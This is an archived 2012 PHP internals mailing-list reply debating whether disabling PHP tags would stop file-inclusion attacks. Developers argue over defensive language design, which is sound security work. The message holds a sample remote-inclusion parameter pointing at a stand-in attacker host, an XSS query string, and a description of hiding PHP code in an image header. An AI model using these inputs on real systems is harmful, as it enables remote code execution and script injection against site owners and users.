Newsgroups: php.internals Path: news.php.net Xref: news.php.net php.internals:59742 Return-Path: Mailing-List: contact internals-help@lists.php.net; run by ezmlm Delivered-To: mailing list internals@lists.php.net Received: (qmail 84108 invoked from network); 11 Apr 2012 17:53:14 -0000 Received: from unknown (HELO lists.php.net) (127.0.0.1) by localhost with SMTP; 11 Apr 2012 17:53:14 -0000 Authentication-Results: pb1.pair.com smtp.mail=kris.craig@gmail.com; spf=pass; sender-id=pass Authentication-Results: pb1.pair.com header.from=kris.craig@gmail.com; sender-id=pass Received-SPF: pass (pb1.pair.com: domain gmail.com designates 74.125.82.54 as permitted sender) X-PHP-List-Original-Sender: kris.craig@gmail.com X-Host-Fingerprint: 74.125.82.54 mail-wg0-f54.google.com Received: from [74.125.82.54] ([74.125.82.54:62686] helo=mail-wg0-f54.google.com) by pb1.pair.com (ecelerity 2.1.1.9-wez r(12769M)) with ESMTP id 35/38-36454-805C58F4 for ; Wed, 11 Apr 2012 13:53:13 -0400 Received: by wgbdq13 with SMTP id dq13so931077wgb.11 for ; Wed, 11 Apr 2012 10:53:09 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=4ghCbfF/QlGeTCqVju7haI6ucBOZZOgTzlbwN4nVmdg=; b=gOy4gkTmyrVjz7aR3BI5axNCQGG5cwcjKkSTrmftFd9aNMmqyc1gkXwDV0QxWWZ1aQ XzNTdHYgpVCYV4LcWK/krar5ddccI6qbbekWjpTckv8K0q397wTJXXYG6lu5WdZq/tAa /awwwOzSL6BDu/f15zYzSKUsQfRu8hJvdPUWsRO0yVP4HIeFwQY8COoDutq3j8T8B8/q gdd6UvvfLDtWD0Kveq0lKN1fcfMqvqMUGuBX7r2wgmz+hrMzrspzqmc+61NfENMU9s39 X6rUUGat8oLPxaQlKMhS7GD9TThw70QdwMJgitQn3CC79jJ4ffhKA+ewIq5CzwHvinAw 0VLA== MIME-Version: 1.0 Received: by 10.180.95.197 with SMTP id dm5mr8561273wib.20.1334166789171; Wed, 11 Apr 2012 10:53:09 -0700 (PDT) Received: by 10.223.79.67 with HTTP; Wed, 11 Apr 2012 10:53:09 -0700 (PDT) In-Reply-To: References: <4F850D06.10701@sugarcrm.com> <4F8515AF.8060706@sugarcrm.com> <4F851FE4.7000706@sugarcrm.com> <4F8539E0.1090701@sugarcrm.com> <4F859063.1010401@lerdorf.com> Date: Wed, 11 Apr 2012 10:53:09 -0700 Message-ID: To: John Crenshaw Cc: Rasmus Lerdorf , Stas Malyshev , Yasuo Ohgaki , "internals@lists.php.net" Content-Type: multipart/alternative; boundary=f46d04447f478a299304bd6ae933 Subject: Re: [PHP-DEV] Re: Disabling PHP tags by php.ini and CLI options From: kris.craig@gmail.com (Kris Craig) --f46d04447f478a299304bd6ae933 Content-Type: text/plain; charset=ISO-8859-1 On Wed, Apr 11, 2012 at 10:38 AM, John Crenshaw wrote: > From: Rasmus Lerdorf [mailto:rasmus@lerdorf.com] > > I guess he is saying that it prevents: > > > > Random bytes > > > > More random bytes > > > > Where random bytes might be an image file so finfo_file() might identify > it as a valid image > > Right, but anyone can trivially construct a fully valid bitmap with a > starting byte sequence of `42 4D 3B 2F 2A`, which resolves to `BM;/*`. PHP > will decide that BM meant 'BM', effectively skipping it, then the open > comment will slide the PHP interpreter past any remaining header stuff. You > can close the comment and place the actual code payload anywhere in the > image data. The early bytes in other image formats are similarly > exploitable. As far as I can tell there is really no security win here. > > > 4. Only protecting against mid-script injections and not top-of-script > injections is a somewhat subtle concept when the real problem is the > vulnerable include $_GET['filename'] hole. If this really is a prevalent > problem, maybe instead of trying to mitigate the symptoms, why don't we try > to attack the actual cause of the problem. I would love to hear some ideas > along those lines that don't fundamentally change the nature of PHP for > somewhat cloudy benefits. > > > > -Rasmus > > It's disturbingly common. Probably 90% of the automated attacks I see in > the 404 error logs are trying to exploit various inclusion vulnerabilities. > > One idea that comes to mind immediately is the old taint RFC: > https://wiki.php.net/rfc/taint. This doesn't actually prevent LFI, but it > (optionally) warns the developer that they did something very bad, > regardless of whether it actually caused a problem with the specific input > data. I'd really love to see that one finalized and implemented. > > Another wild alternative could be to have a non-trivial string format > internally, where PHP strings are actually a set of distinct blocks which > each contain encoding information. This would make it possible to > concatenate strings just as always, but since the attributes of each block > are known the entire string contents could be manipulated to an arbitrary > final encoding, (or rejected as impossible to safely convert) when the > string is actually used. In the include case this isn't really very > different from taint, because safe conversion is impossible, but for things > like XSS and SQL injection it could actually *fix* the otherwise vulnerable > code. A simplified example of how this might work: > > http://example.com?name=%3Cscript%3Exss()%3B%3C%2Fscript%3E > > // $_GET['name'] === [text&user&utf8('')]; > $name = $_GET['name']; > > $welcome = html("Welcome $name!"); // $welcome === [html('Welcome > '), text&user&utf8(''), html('!')]; > > echo $_GET['name']; // assuming the current output format is text/html, > the output will be "Welcome <script>xss();</script>!" > > Obviously this second idea is probably a prohibitively large change, there > is some BC break (especially where an input was known to be HTML but > secured via something like HTMLPurifier), and there are huge open questions > (like how to handle string comparison). Still, I think it is interesting > because it actually divines the real meaning. The intent of the above code > is obvious to a developer, and something like this could bring that > understanding to the final result. This specific concept has issues, but > maybe it gives someone else a more practical idea. > > John Crenshaw > Priacta, Inc. > > -- > PHP Internals - PHP Runtime Development Mailing List > To unsubscribe, visit: http://www.php.net/unsub.php > > I can't help but question whether we should even be worrying about LFI/RFI to begin with. Personally, I would *never* check-off on code that in any way used $_GET or $_POST directly in an include/require statement! It's just plain lazy. There's just no excuse for doing that. Use some sort of dispatch or translation table. Sure, it might seem less "magical," but it'll also protect you from some asshole hitting you with something like, "?file=http://hacksite.com/injectedcode.php?". The individual code developer has to take *some* responsibility for their code. If this is such a problem, I would think the solution would be to update our docs to better warn people about this type of attack and educate them on how not to write code that's vulnerable to it. We can make the language secure; but, in the end, a language is only as smart as the person using it. --Kris --f46d04447f478a299304bd6ae933--